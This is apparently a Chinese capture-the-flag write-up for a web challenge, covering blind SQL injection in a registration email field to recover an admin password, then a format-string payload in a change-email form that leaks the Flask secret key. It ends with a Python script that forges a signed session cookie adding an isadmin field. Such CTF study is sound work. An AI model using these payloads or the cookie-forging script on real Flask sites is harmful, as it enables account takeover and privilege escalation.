只有注册和登录,根据题目提示发现注册的email字段有盲注漏洞,跑出admin密码为h4ck4fun
登录admin,发现多了个修改邮箱功能
根据提示 secret in /flag ,访问http://220.249.52.133:34412/flag
根据提示猜测应该需要获取secret_key重新加密cookie,增加isadmin字段,才能得到flag。
修改邮箱的接口处传入 mail={user.__class__.__init__.__globals__[current_app].config}@qq.com,得到secret_key
mail={user.__class__.__init__.__globals__[capp].secret_key}@qq.com 也可以
使用脚本重新加密cookie
from flask.sessions import SecureCookieSessionInterface
import traceback
import ast
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
def encode(secret_key, session_cookie_structure):
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
traceback.print_exc()
raise Exception, "error"
return False
if __name__ == "__main__":
payload = "{'isadmin': 1, 'user': (1, 'admin', 'admin@qq.com')}"
key = '5d2b90b3752f9fc73310f89b8cfc265b'
print(encode(key, payload))得到flag
